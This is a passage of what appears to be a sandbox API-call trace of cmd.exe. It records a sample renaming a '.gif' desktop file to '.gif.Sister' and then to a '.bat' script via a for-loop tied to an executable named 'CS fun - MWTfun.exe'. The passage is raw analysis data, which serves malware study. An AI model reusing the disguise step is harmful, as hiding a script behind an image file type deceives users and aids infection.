Flags=0x8, Size=0x4012) returned 0x21ed955d8d0 [0178.506] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0178.506] GetProcessHeap () returned 0x21ed8c70000 [0178.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8d6ecc0 [0178.507] ??_V@YAXPEAX@Z () returned 0x1 [0178.507] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0178.507] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d64a40 [0178.507] FindClose (in: hFindFile=0x21ed8d64a40 | out: hFindFile=0x21ed8d64a40) returned 1 [0178.507] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65100 [0178.507] FindClose (in: hFindFile=0x21ed8d65100 | out: hFindFile=0x21ed8d65100) returned 1 [0178.507] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x94dd368b, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x94dd368b, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65340 [0178.507] FindClose (in: hFindFile=0x21ed8d65340 | out: hFindFile=0x21ed8d65340) returned 1 [0178.507] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\t2RoafwhrVeC_4Hu.gif", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe16fce60, ftCreationTime.dwHighDateTime=0x1d5ebd5, ftLastAccessTime.dwLowDateTime=0x77a4ab20, ftLastAccessTime.dwHighDateTime=0x1d5e227, ftLastWriteTime.dwLowDateTime=0x77a4ab20, ftLastWriteTime.dwHighDateTime=0x1d5e227, nFileSizeHigh=0x0, nFileSizeLow=0x27eb, dwReserved0=0x4, dwReserved1=0x80, cFileName="t2RoafwhrVeC_4Hu.gif", cAlternateFileName="T2ROAF~1.GIF")) returned 0x21ed8d64b60 [0178.508] FindClose (in: hFindFile=0x21ed8d64b60 | out: hFindFile=0x21ed8d64b60) returned 1 [0178.508] _wcsnicmp (_String1="T2ROAF~1.GIF", _String2="t2RoafwhrVeC_4Hu.gif", _MaxCount=0x14) returned 7 [0178.508] malloc (_Size=0x1ff9c) returned 0x21ed967fe80 [0178.508] ??_V@YAXPEAX@Z () returned 0x21ed967fe80 [0178.509] GetProcessHeap () returned 0x21ed8c70000 [0178.509] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed937a770 [0178.509] ??_V@YAXPEAX@Z () returned 0x1 [0178.509] ??_V@YAXPEAX@Z () returned 0x1 [0178.509] GetProcessHeap () returned 0x21ed8c70000 [0178.509] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed955d8d0, Size=0x1c0) returned 0x21ed955d8d0 [0178.510] GetProcessHeap () returned 0x21ed8c70000 [0178.510] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed955d8d0) returned 0x1c0 [0178.510] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0178.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.510] GetFileType (hFile=0x50) returned 0x2 [0178.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.510] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0178.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.524] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0178.548] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0178.548] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0178.548] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0178.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.548] GetFileType (hFile=0x50) returned 0x2 [0178.548] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.548] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0178.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.559] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0178.567] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.567] GetFileType (hFile=0x50) returned 0x2 [0178.568] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.568] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0178.577] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.577] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed955d3f0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed955d3f0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0178.631] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"t2RoafwhrVeC_4Hu.gif\" \"t2RoafwhrVeC_4Hu.gif.Sister\" ") returned 54 [0178.631] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.631] GetFileType (hFile=0x50) returned 0x2 [0178.631] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.631] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0178.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.705] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0178.778] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0178.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.778] GetFileType (hFile=0x50) returned 0x2 [0178.778] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.778] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0178.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.852] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0178.957] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0178.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0178.957] GetFileType (hFile=0x50) returned 0x2 [0178.957] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0178.957] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0179.129] _get_osfhandle (_FileHandle=1) returned 0x50 [0179.129] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0179.206] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0179.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0179.206] GetFileType (hFile=0x50) returned 0x2 [0179.206] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0179.206] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0179.310] _get_osfhandle (_FileHandle=1) returned 0x50 [0179.310] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0179.413] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0179.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0179.413] GetFileType (hFile=0x50) returned 0x2 [0179.414] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0179.414] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0179.567] _get_osfhandle (_FileHandle=1) returned 0x50 [0179.567] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0179.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0179.660] GetFileType (hFile=0x50) returned 0x2 [0179.660] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0179.660] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0179.761] _get_osfhandle (_FileHandle=1) returned 0x50 [0179.761] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed955d8a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed955d8a0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0179.833] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"t2RoafwhrVeC_4Hu.gif.Sister\" \"t2RoafwhrVeC_4Hu.bat\" ") returned 54 [0179.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0179.833] GetFileType (hFile=0x50) returned 0x2 [0179.833] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0179.833] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0179.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0179.931] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0180.011] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0180.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0180.011] GetFileType (hFile=0x50) returned 0x2 [0180.011] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0180.011] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0180.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0180.164] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0180.243] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0180.263] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0180.264] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0180.264] malloc (_Size=0xffce) returned 0x21ed967fe80 [0180.264] ??_V@YAXPEAX@Z () returned 0x21ed967fe80 [0180.264] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0180.264] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0180.264] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0180.264] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0180.264] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0180.264] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0180.264] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0180.264] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0180.264] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0180.264] ??_V@YAXPEAX@Z () returned 0x1 [0180.264] GetProcessHeap () returned 0x21ed8c70000 [0180.264] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed937a190 [0180.264] GetProcessHeap () returned 0x21ed8c70000 [0180.264] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937a190, Size=0x7c) returned 0x21ed937a190 [0180.264] GetProcessHeap () returned 0x21ed8c70000 [0180.264] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937a190) returned 0x7c [0180.264] GetProcessHeap () returned 0x21ed8c70000 [0180.264] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x84) returned 0x21ed9379270 [0180.264] GetProcessHeap () returned 0x21ed8c70000 [0180.264] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed937b840 [0180.264] GetProcessHeap () returned 0x21ed8c70000 [0180.264] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937b840, Size=0x7c) returned 0x21ed937b840 [0180.265] GetProcessHeap () returned 0x21ed8c70000 [0180.265] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937b840) returned 0x7c [0180.265] malloc (_Size=0xffce) returned 0x21ed967fe80 [0180.265] ??_V@YAXPEAX@Z () returned 0x21ed967fe80 [0180.265] GetProcessHeap () returned 0x21ed8c70000 [0180.265] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65940 [0180.265] GetProcessHeap () returned 0x21ed8c70000 [0180.265] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed95599a0 [0180.265] _wcsicmp (_String1="t2RoafwhrVeC_4Hu.gif", _String2=".") returned 70 [0180.265] _wcsicmp (_String1="t2RoafwhrVeC_4Hu.gif", _String2="..") returned 70 [0180.265] GetFileAttributesW (lpFileName="t2RoafwhrVeC_4Hu.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\t2roafwhrvec_4hu.gif")) returned 0x20 [0180.265] GetProcessHeap () returned 0x21ed8c70000 [0180.265] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed955daa0 [0180.266] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed955dab0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0180.266] SetErrorMode (uMode=0x0) returned 0x0 [0180.266] SetErrorMode (uMode=0x1) returned 0x0 [0180.266] GetFullPathNameW (in: lpFileName="t2RoafwhrVeC_4Hu.gif", nBufferLength=0x7fe7, lpBuffer=0x21ed967fe80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\t2RoafwhrVeC_4Hu.gif", lpFilePart=0xa6cf4fd660*="t2RoafwhrVeC_4Hu.gif") returned 0x2c [0180.266] SetErrorMode (uMode=0x0) returned 0x1 [0180.267] GetProcessHeap () returned 0x21ed8c70000 [0180.267] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955ad20 [0180.267] _wcsicmp (_String1="t2RoafwhrVeC_4Hu.gif", _String2=".") returned 70 [0180.267] _wcsicmp (_String1="t2RoafwhrVeC_4Hu.gif", _String2="..") returned 70 [0180.267] GetFileAttributesW (lpFileName="t2RoafwhrVeC_4Hu.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\t2roafwhrvec_4hu.gif")) returned 0x20 [0180.267] ??_V@YAXPEAX@Z () returned 0x1 [0180.267] malloc (_Size=0xffce) returned 0x21ed967fe80 [0180.267] ??_V@YAXPEAX@Z () returned 0x21ed967fe80 [0180.267] malloc (_Size=0xffce) returned 0x21ed968fe60 [0180.267] ??_V@YAXPEAX@Z () returned 0x21ed968fe60 [0180.268] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\t2RoafwhrVeC_4Hu.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\t2roafwhrvec_4hu.gif")) returned 0x20 [0180.268] malloc (_Size=0xffce) returned 0x21ed923fd00 [0180.268] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0180.268] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\t2RoafwhrVeC_4Hu.gif", fInfoLevelId=0x1, lpFindFileData=0x21ed95599b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed95599b0) returned 0x21ed8d65460 [0180.268] malloc (_Size=0xffce) returned 0x21ed924fce0 [0180.268] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0180.268] ??_V@YAXPEAX@Z () returned 0x1 [0180.268] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\t2RoafwhrVeC_4Hu.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\t2roafwhrvec_4hu.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\t2RoafwhrVeC_4Hu.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\t2roafwhrvec_4hu.gif.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0180.277] FindNextFileW (in: hFindFile=0x21ed8d65460, lpFindFileData=0x21ed95599b0 | out: lpFindFileData=0x21ed95599b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe16fce60, ftCreationTime.dwHighDateTime=0x1d5ebd5, ftLastAccessTime.dwLowDateTime=0x77a4ab20, ftLastAccessTime.dwHighDateTime=0x1d5e227, ftLastWriteTime.dwLowDateTime=0x77a4ab20, ftLastWriteTime.dwHighDateTime=0x1d5e227, nFileSizeHigh=0x0, nFileSizeLow=0x27eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="t2RoafwhrVeC_4Hu.gif", cAlternateFileName="")) returned 0 [0180.279] GetLastError () returned 0x12 [0180.279] FindClose (in: hFindFile=0x21ed8d65460 | out: hFindFile=0x21ed8d65460) returned 1 [0180.279] ??_V@YAXPEAX@Z () returned 0x1 [0180.279] ??_V@YAXPEAX@Z () returned 0x1 [0180.279] ??_V@YAXPEAX@Z () returned 0x1 [0180.281] ??_V@YAXPEAX@Z () returned 0x1 [0180.281] GetProcessHeap () returned 0x21ed8c70000 [0180.281] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65100 [0180.281] GetProcessHeap () returned 0x21ed8c70000 [0180.281] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95940, Size=0x16) returned 0x21ed8c95660 [0180.281] GetProcessHeap () returned 0x21ed8c70000 [0180.281] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95660) returned 0x16 [0180.281] GetProcessHeap () returned 0x21ed8c70000 [0180.281] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0180.281] GetProcessHeap () returned 0x21ed8c70000 [0180.281] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0180.281] GetProcessHeap () returned 0x21ed8c70000 [0180.281] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed937b8d0 [0180.281] GetProcessHeap () returned 0x21ed8c70000 [0180.281] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937b8d0, Size=0xb2) returned 0x21ed937b8d0 [0180.281] GetProcessHeap () returned 0x21ed8c70000 [0180.281] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937b8d0) returned 0xb2 [0180.281] GetProcessHeap () returned 0x21ed8c70000 [0180.281] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956da90 [0180.282] GetProcessHeap () returned 0x21ed8c70000 [0180.282] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956da90, Size=0x30) returned 0x21ed956da90 [0180.282] GetProcessHeap () returned 0x21ed8c70000 [0180.282] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed956da90) returned 0x30 [0180.282] GetProcessHeap () returned 0x21ed8c70000 [0180.282] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed956dad0 [0180.282] malloc (_Size=0x1ff9c) returned 0x21ed967fe80 [0180.284] GetProcessHeap () returned 0x21ed8c70000 [0180.284] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937c910 [0180.284] GetProcessHeap () returned 0x21ed8c70000 [0180.284] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937c850 [0180.284] ??_V@YAXPEAX@Z () returned 0x1 [0180.284] malloc (_Size=0x1ff9c) returned 0x21ed967fe80 [0180.285] GetProcessHeap () returned 0x21ed8c70000 [0180.285] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937ccd0 [0180.285] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed967fe80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0180.285] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937a270, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d64a40 [0180.285] FindClose (in: hFindFile=0x21ed8d64a40 | out: hFindFile=0x21ed8d64a40) returned 1 [0180.285] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937a270, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d64a40 [0180.285] FindClose (in: hFindFile=0x21ed8d64a40 | out: hFindFile=0x21ed8d64a40) returned 1 [0180.285] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x960eac97, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x960eac97, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937a270, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64b00 [0180.285] FindClose (in: hFindFile=0x21ed8d64b00 | out: hFindFile=0x21ed8d64b00) returned 1 [0180.286] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x960eac97, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x960eac97, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937a270, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0180.286] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0180.286] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0180.287] GetProcessHeap () returned 0x21ed8c70000 [0180.287] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d675b0 [0180.287] ??_V@YAXPEAX@Z () returned 0x1 [0180.287] ??_V@YAXPEAX@Z () returned 0x1 [0180.287] GetProcessHeap () returned 0x21ed8c70000 [0180.287] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed956dad0, Size=0x490) returned 0x21ed956dad0 [0180.287] GetProcessHeap () returned 0x21ed8c70000 [0180.287] RtlSizeHeap 